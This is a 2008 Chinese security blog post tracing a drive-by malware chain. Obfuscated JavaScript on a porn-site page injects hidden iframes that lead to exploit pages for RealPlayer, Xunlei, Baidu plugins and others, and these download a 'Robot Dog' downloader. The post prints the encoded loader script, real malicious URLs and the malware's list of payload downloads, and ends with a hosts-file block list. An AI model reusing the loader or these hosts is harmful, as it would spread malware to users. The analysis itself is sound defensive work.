网马分析-22ccc.com隐藏真是地址,下载机器狗新变种!(Nod32.2008.2.7查不到毒)
网马分析-22ccc.com隐藏真是地址,下载机器狗新变种!(Nod32.2008.2.7查不到毒) - 死性不改's Blog~http://www.clxp.net.cn/article.asp?id=812
本站会员:“穷光蛋”给我留言,说22ccc域名变更,于是我去看了下。找出以下与hao.22ccc.com同一主机的域名
hao.22ccc.com
a.55sss.com
ww.55sss.com
另外,本着天上不会掉馅饼的原则,访问了hao.22ccc.com,看有没有病毒。
访问发现,主页面是没有问题的。
但是访问某分类却出现问题。
访问http://hao.22ccc.com/。然后点某分类后。会提示启动real播放器。
比如访问图片区:http://hao.22ccc.com/html/pic/index.html
发现IE7提示需要加载RealNetworks,Inc。。。。。。。。。。
http://www.clxp.net.cn/attachments/month_0802/820082711941.gif
使用HTTPDEUBGER访问http://hao.22ccc.com/html/pic/index.html
http://www.clxp.net.cn/attachments/month_0802/0200827111032.gif
发现页面里面什么也看不出来。根本没什么内容。。。仔细一看。发现有段加密代码。
Copy code to clipboardhttp://www.clxp.net.cn/images/code.gif程序代码
<SCRIPT LANGUAGE="JavaScript"><!--var HtmlStrings=["=jgsbnf!obnf>J2!
tsd>#iuuq;00mjbo/bbuuu/dpn0iunm0qjd0joefy/iunm#!","rvbmjuz>ijhi!XJEUI>#211&#!IFJHIU>#211&#!NBSHJOXJEUI>#1#!
NBSHJ","OIFJHIU>#1#!ITQBDF>#1#!WTQBDF>#1#!GSBNFCPSEFS>#1#!TDSPMMJOH>#","zft#>=0jgsbnf>"];function psw(st){var varS;
varS="";var i;for(var a=0;a<st.length;a++){ i = st.charCodeAt(a); if (i==1) varS=varS+String.fromCharCode
('"'.charCodeAt()-1); else if (i==2) { a++; varS+=String.fromCharCode(st.charCodeAt(a)); } else
varS+=String.fromCharCode(i-1);}return varS;};var num=4;function S(){for(i=0;i<num;i++)document.write(psw(HtmlStrings
));}S();// --></SCRIPT>
我们把代码下面的document.write改成alert。让他显示出加密内容。
http://www.clxp.net.cn/attachments/month_0802/q200827111113.gif
<iframe name=I1 src="http://lian.aattt.com/html/pic/index.html"
发现此页面是框架装入领一个页面,让我们误认为,色情域名就是hao.22ccc.com,实际上是lian.aattt.com
然后我们访问“http://lian.aattt.com/html/pic/index.html”因为有网马,所以要继续往下查喽~
访问此页面后,看到代码基本是真是代码了。。。在页面底部,发现框架载入网马!
http://www.clxp.net.cn/attachments/month_0802/b200827111148.gif
<iframe src="/tongji.htm" width="20" height="0" frameborder="0"></iframe><iframe src=http://3.kv8.info/index.htm width=100
height=0></iframe>
http://lian.aattt.com/tongji.htm---网站统计代码。无马。
访问:http://3.kv8.info/index.htm
发现网马了~ ^_^...
http://3.kv8.info/real.htm---real漏洞;下载:http://gm.kv8.info/mm.exe
http://3.kv8.info/xl.htm---迅雷漏洞;失效
http://3.kv8.info/bf.htm---暴风2漏洞;失效
http://3.kv8.info/pps.htm---pps漏洞;失效
http://3.kv8.info/cx.htm---不知道啥漏洞;失效
http://3.kv8.info/lz.htm---联众漏洞;下载:http://gm.kv8.info/mm.exe
http://3.kv8.info/baidu.htm---百度插件漏洞;下载:http://gm.kv8.info/mm.cab
mm.exe机器狗+下载者。
http://www.clxp.net.cn/attachments/month_0802/e200827111215.gif
通过http://cnxz.kv8.info/images/xin.txt获得下载的病毒列表。
http://www.clxp.net.cn/images/quote.gif 引用内容
VERSION=2008-1-25NEWVERSION=http://444.sqmnoopt.com/xm/gx.exe(新版本下载地址)
1=http://2.kv8.info/xm/aa1.exe2=http://2.kv8.info/xm/aa2.exe3=http://2.kv8.info/xm/aa3.exe4=http://2.kv8.info/xm/aa4.exe5=htt
p://2.kv8.info/xm/aa5.exe6=http://2.kv8.info/xm/aa6.exe7=http://2.kv8.info/xm/aa7.exe8=http://2.kv8.info/xm/aa8.exe9=http://2
.kv8.info/xm/aa9.exe10=http://2.kv8.info/xm/aa10.exe11=http://2.kv8.info/xm/aa11.exe12=http://2.kv8.info/xm/aa12.exe13=http:/
/2.kv8.info/xm/aa13.exe14=http://444.sqmnoopt.com/xm/aa14.exe15=http://444.sqmnoopt.com/xm/aa15.exe16=http://444.sqmnoopt.com
/xm/aa16.exe17=http://444.sqmnoopt.com/xm/aa17.exe18=http://444.sqmnoopt.com/xm/aa18.exe19=http://444.sqmnoopt.com/xm/aa19.ex
e20=http://444.sqmnoopt.com/xm/aa20.exe21=http://444.sqmnoopt.com/xm/aa21.exe22=http://444.sqmnoopt.com/xm/aa22.exe23=http://
444.sqmnoopt.com/xm/aa23.exe24=http://444.sqmnoopt.com/xm/aa24.exe25=http://444.sqmnoopt.com/xm/aa25.exe26=http://444.sqmnoop
t.com/xm/aa26.exe
封锁域名:
127.0.0.1 hao.22ccc.com #色情网站By 穷光蛋 2008/2/7
127.0.0.1 a.55sss.com #色情网站By 穷光蛋 2008/2/7
127.0.0.1 ww.55sss.com #色情网站By 穷光蛋 2008/2/7
127.0.0.1 lian.aattt.com #色情网站By 穷光蛋 2008/2/7
127.0.0.1 444.sqmnoopt.com #机器狗加下载者By 穷光蛋 2008/2/7
127.0.0.1 2.kv8.info #机器狗加下载者By 穷光蛋 2008/2/7
127.0.0.1 3.kv8.info #机器狗加下载者By 穷光蛋 2008/2/7
127.0.0.1 cnxz.kv8.info #机器狗加下载者By 穷光蛋 2008/2/7
127.0.0.1 gm.kv8.info #机器狗加下载者By 穷光蛋 2008/2/7
封锁IP:
59.34.216.248
59.34.216.247
125.90.66.188
页:
[1]